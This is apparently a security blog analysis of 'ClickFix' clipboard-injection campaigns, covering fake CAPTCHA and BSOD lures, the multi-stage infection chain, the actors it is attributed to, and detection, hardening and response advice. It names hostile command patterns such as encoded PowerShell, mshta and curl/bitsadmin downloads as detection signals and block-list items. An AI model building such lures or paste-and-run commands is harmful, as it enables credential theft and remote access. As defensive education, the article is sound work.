ProBackend
ai cyber threats nation state phishing
1 hour ago9 min read

No Longer the Exception: How the Ingenious 'ClickFix' Hook Became Cybercrime's New Standard

An in-depth analysis of the massive surge in 'ClickFix' clipboard-injection campaigns, tracking its graduation from a novel proof-of-concept to the dominant delivery method utilized by top-tier cybercriminals and nation-state advanced persistent threat (APT) groups.

The day your mouse became a weapon

You’re browsing. Maybe it’s a news site, maybe a niche forum, maybe a legitimate streaming page that got roped into the mess. You click Play. Or maybe you click that button to download your invoice. Or maybe a CAPTCHA window pops up, telling you to prove you’re human.

Then it happens. A fake browser error. Or a Cloudflare check that just won’t quit. Or, in the most audacious version I’ve seen, your entire screen goes blue—Windows BSOD—complete with a fake error code and a bold "How to fix it?" button. You click.

The clipboard does its thing—pastes a command into your paste buffer without you even noticing—and the dialog box tells you, in perfect plain English, to open Run (Win+R), paste, and hit Enter. You’re helping it along.

This isn’t malware in the old sense. No trojan horse, no suspicious email attachment. Just a convincing lie wrapped in familiar UI, riding on your muscle memory to run code with your own permissions. If this feels creepy—and it should—it’s because the attackers finally cracked the hardest part: not out-smarting your firewall, but out-waiting your instinct to fix the thing that’s broken.

ClickFix isn’t some fringe experiment anymore. According to ESET, campaigns using this pattern jumped 517% in the first half of 2025 alone, and Microsoft’s threat intel team says it now reaches thousands of devices every single day. That’s the part that still chills me: this started as a researcher curiosity 18 months ago and has become the default delivery mechanism for Lumma Stealer, NetSupport RAT, AsyncRAT, DanaBot, and half a dozen other staples in the criminal ecosystem. In other words: ClickFix is no longer an exception. It’s now the rule.


How a simple paste built a malware empire

The brilliance—and the awful simplicity—of ClickFix lies in its non-technical shell game. Here’s what it looks like on the wire:

  1. Arrival vector: phishing email, malvertising, or a compromised landing page (often serving pirated content or fake invoices). In one May 2024 campaign tracked by Microsoft, threat actor Storm-1607 sent tens of thousands of emails with HTML attachments mimicking Microsoft Word errors, tricking victims into copying PowerShell commands.

  2. The hook: A visual cue that feels legitimate—Cloudflare CAPTCHA, Zoom/Google Meet connection issues, fake BSODs, or error messages on legitimate document viewers. In March 2025, Microsoft documented Storm-1865 impersonating Booking.com to trick hospitality-sector staff into "fixing" a fake reservation system error.

  3. Clipboard injection: JavaScript silently overwrites the clipboard with an obfuscated command string while the user reads the "instructions." This string looks benign at first glance but typically begins with powershell.exe -EncodedCommand, mshta.exe, or a curl/bitsadmin download call.

  4. User execution: The victim opens Run (Win+R), pastes the text, and hits Enter. No suspicious binary is downloaded; instead, a living-off-the-land binary (LOLBin) executes the encoded payload from memory.

  5. Multi-stage payload: The first stage drops a second, larger script that adds persistence (RunMRU registry tweaks, startup folder CMD files), checks for sandbox environments, and phones home. Only then does the final payload arrive—most commonly Lumma Stealer for credential harvesting, or RATs like NetSupport, AsyncRAT, or XWorm.

What’s insidious is how the attack chain leans on the user to complete steps that would otherwise trip traditional controls. Your EDR won’t flag powershell.exe launched from explorer.exe. Your mail gateway sees a plain-text email with no malicious attachment. The URL often points to a recently-registered domain or even a compromised legitimate site (WordPress, Pastebin). The whole operation rides on user consent disguised as help.


The fake that became real: lure variants observed in the wild

Hard2bit’s June 2026 analysis tracks at least five distinct lure templates that are still circulating in mid-2026. Each tries to exploit a different sense of normalcy:

Cloudflare CAPTCHA: The user lands on a compromised page and sees the familiar "Verify you are human" box, but the normal checkboxes don’t load. Instead, they’re instructed to open Win+R and paste. Microsoft’s August 2025 blog confirmed this appears in campaigns run by both criminal affiliate Storm-1607 and nation-state actors.

Simulated Word/Chrome errors: Proofpoint TA571 frequently used HTML attachments pretending to be Microsoft Word documents showing "can’t display" errors with a built-in "How to fix?" link. The pattern later reappeared in Chrome crashes, missing codec alerts, and even fake DNS failures.

Download-site verification: Recent campaigns for pirated software, cracks, or driver downloads present a "verify you’re not a bot" screen before the download. This is indistinguishable from the legitimate site, and it includes a clipboard-injected PowerShell one-liner.

Meeting links and reservations: Beyond Booking.com, attackers have impersonated Microsoft Teams, Google Meet, Zoom invites, and travel confirmations. In one late-2025 case, a fake Zoom error asked victims to paste commands into Terminal on macOS—proving ClickFix isn’t just a Windows play.

Fake BSOD simulation: The most psychologically potent variant presents a near-perfect replica of the Windows Blue Screen of Death, complete with error codes and driver names. The prompt tells you to paste a PowerShell repair script to fix the crash. ESET noted this spike in Q4 2025 among incident responders.

The common thread? Every lure assumes you already know how to open Win+R or Terminal and that pasting a command is an innocuous, routine act. For most users—and yes, even for some IT staff—the reflex is to comply before reading the fine print.


From research curiosity to nation-state staple: attribution and adoption

ClickFix went from proof-of-concept to prime-time threat incredibly fast. Microsoft’s research places its first observed use in April 2024 with TA571 campaigns delivering DarkGate loaders. By H1 2025, ESET’s telemetry showed a 517% uptick, and Microsoft confirmed thousands of daily infections across multiple industries.

The commoditization followed shortly after. Hard2bit reports that ClickFix-as-a-Service kits began appearing on dark web forums, bundling CAPTCHA templates, domain rotation, and payload choice. That “plug-and-play” availability made ClickFix a go-to for lower-tier ransomware affiliates and access brokers who lacked the scripting expertise to build custom lures.

By late 2025, nation-state actors adopted the technique—not because it was new, but because it was reliable. Virus Bulletin’s VB2025 abstract confirms attribution to:

• APT28 (Russia) • Kimsuky (North Korea) • MuddyWater (Iran)

Microsoft’s report ties Storm-1607, Storm-0426, and Storm-0249 to the proliferation of ClickFix campaigns. These are not lone wolves; they’re organized threat groups who realized this vector bypasses most perimeter controls and doesn’t require zero-day exploits—just psychology.


Detection that actually works: hunting what the victor leaves behind

The good news is ClickFix, for all its cleverness, leaves a clear trail. You just have to look in the right places:

RunMRU is your best friend: The HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key logs every command typed into Win+R. On a healthy workstation, this key shouldn’t contain PowerShell -EncodedCommand, mshta.exe, curl with base64, or URLs pointing to paste services. Microsoft Defender XDR KQL queries targeting this key produce near-zero false positives.

Anomalous process trees: The chain explorer.exe → powershell.exe (or mshta.exe, conhost.exe) with long encoded arguments is a strong signal. EDR products can alert on command lines containing -EncodedCommand, -nop, -W hidden, or IEX. If your org uses PowerShell legitimately, restrict non-constrained language mode via AppLocker or WDAC to block ad-hoc scripts.

Network telemetry after execution: The loader always phones home for the second stage. An outbound connection from powershell.exe to a freshly registered domain or pastebin site should trigger high-severity alerts, especially if you’re running attack surface management.

Virus Bulletin’s Prashant Tilekar notes that many defenders focus on blocking the final payload, but the real win is catching the clipboard injection and Win+R launch before the loader runs. That’s where behavioral analytics beat signature-based detection every time.


Defences that actually matter: hardening before the click

There’s no single switch to turn ClickFix off, but three concrete layers make it significantly harder:

Endpoint hardening via GPO and ASR Microsoft Defender’s Attack Surface Reduction (ASR) rules are particularly effective:

• Block obfuscated script execution • Prevent Office apps from creating child processes • Block PSExec/WMI process creation • Stop unsigned files from running on endpoints

Beyond ASR, consider disabling Win+R for standard users via GPO. That alone kills the most common ClickFix lure. For admin and dev profiles, use AppLocker or WDAC to restrict which binaries can be invoked interactively.

Lock down PowerShell and LOLBins The baseline should include:

• PowerShell Constrained Language Mode • Script block logging shipped to your SIEM • Transcription enabled • AMSI integrated

mshta.exe, bitsadmin, regsvr32, and rundll32 are well-known LOLBins. If your analysts don’t need them, block them entirely on non-admin profiles.

Identity as the last line of defense When credentials do get pilfered (and they will), a strong identity layer limits damage:

• Phishing-resistant MFA on privileged access • Short session lifetimes on critical apps • Block legacy authentication protocols

The point isn’t to stop ClickFix—because eventually, it will bypass a few controls—but to reduce the value of stolen cookies and session tokens.


Training that sticks: one simple rule for the workforce

Traditional phishing simulations don’t prepare users for ClickFix. The recipient isn’t opening an attachment or clicking a dodgy link; they’re being asked to paste text and press Enter—actions that feel routine in office culture.

What actually works is a single, unbreakable rule:

No legitimate vendor, no internal system, and no website will ever ask you to paste commands into a system window. Ever. If you’re asked, it’s always a scam.

That sentence needs to be repeated in onboarding, internal signage, and security trainings. For IT and dev teams, add a reflex drill: read the command line before you run it—especially when copying from Stack Overflow, ChatGPT, or external docs. A harmless internal simulation (e.g., pasting calc.exe and notifying the security team) beats five fake email quizzes.


What to do if the click already happened

If ClickFix has already executed, treat it like any endpoint compromise:

  1. Isolate the workstation
  2. Collect evidence: pull the RunMRU key and process tree
  3. Rotate passwords and revoke session tokens in Entra ID (or your IdP)
  4. Scan the estate for indicators
  5. Open formal incident response

Assume one endpoint was unlikely to be the only target—ClickFix campaigns often bounce against multiple victims within an org before one falls.

If in-house capacity isn’t available to act within hours, bring in a managed IR service or 24/7 SOC. The difference between containment and regulatory breach often comes down to minutes.


ClickFix isn’t going away in 2026. It’s too cheap, too reliable, and too commoditized. The “ClickFix-as-a-Service” kits already bundle CAPTCHA templates, rotating domains, and payload choice. For attackers, it’s a turnkey solution for bypassing perimeter defenses.

The takeaway isn’t fear. It’s awareness. The technique works only when users forget to question the "fix." Your best defense is a workforce trained to treat clipboard prompts with the same skepticism they’d show a suspicious email attachment.

The bad guys didn’t find a new zero-day. They just leaned on human nature, polished it with JavaScript, and called it a "repair tool." That’s the real horror—and the best reason to keep your people sharp.

The day your mouse became a weapon

More blogs